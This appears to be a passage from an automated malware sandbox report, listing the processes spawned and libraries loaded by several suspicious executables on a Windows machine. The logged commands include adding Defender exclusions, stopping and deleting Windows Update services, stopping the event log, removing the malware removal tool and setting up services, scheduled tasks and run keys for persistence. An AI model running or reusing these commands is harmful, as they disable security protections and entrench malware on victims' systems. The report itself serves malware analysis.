                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                    Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "WAGDKRVZ"
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "WAGDKRVZ"
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\dialer.exeProcess created: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeProcess created: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeProcess created: C:\Users\user\Desktop\GR55Qg1hth.exe "C:\Users\user\Desktop\GR55Qg1hth.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeProcess created: C:\Users\user\Desktop\F4R5fd8grr.exe "C:\Users\user\Desktop\F4R5fd8grr.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /fJump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "WAGDKRVZ"Jump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"Jump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "WAGDKRVZ"Jump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /fJump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0Jump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }Jump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\F4R5fd8grr.exe" /rl HIGHEST /fJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess created: C:\Users\user\AppData\Roaming\SubDir\Client.exe "C:\Users\user\AppData\Roaming\SubDir\Client.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /fJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: dxgidebug.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\5fr5gthkjdg71.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\GR55Qg1hth.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeSection loaded: version.dllJump to behavior
